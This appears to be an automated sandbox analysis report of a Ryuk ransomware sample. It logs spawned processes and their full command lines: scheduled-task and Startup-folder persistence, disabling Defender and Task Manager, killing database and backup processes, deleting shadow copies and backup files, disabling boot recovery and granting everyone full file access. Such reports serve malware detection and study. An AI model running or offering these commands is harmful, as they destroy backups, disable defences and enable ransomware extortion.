Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1352 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 2920 wrote to memory of 3600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2920 wrote to memory of 3600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1352 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 2540 wrote to memory of 2140 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2540 wrote to memory of 2140 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1352 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4208 wrote to memory of 4964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4208 wrote to memory of 4964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1352 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 3292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 3292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1352 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4860 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4860 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1352 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 2708 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2708 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1352 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4392 wrote to memory of 3476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4392 wrote to memory of 3476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1352 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4992 wrote to memory of 1712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4992 wrote to memory of 1712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1984 wrote to memory of 1828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1984 wrote to memory of 1828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1352 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 2084 wrote to memory of 4240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2084 wrote to memory of 4240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2084 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2084 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1352 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1712 wrote to memory of 4244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1712 wrote to memory of 4244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1352 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 4240 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4240 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1352 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1352 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 3592 wrote to memory of 3540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3592 wrote to memory of 3540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ryuk.exe

"C:\Users\Admin\AppData\Local\Temp\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\ProgramData\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop avpsus /y

C:\Windows\system32\net.exe

net stop avpsus /y

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet/

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y

C:\Windows\system32\net.exe

net stop McAfeeDLPAgentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop mfewc /y

C:\Windows\system32\net.exe

net stop mfewc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y

C:\Windows\system32\net.exe

net stop BMR Boot Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net.exe

net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY start=disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled

C:\Windows\system32\sc.exe

sc config SQLWriter start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled

C:\Windows\system32\sc.exe

sc config SstpSvc start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mspub.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del %0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

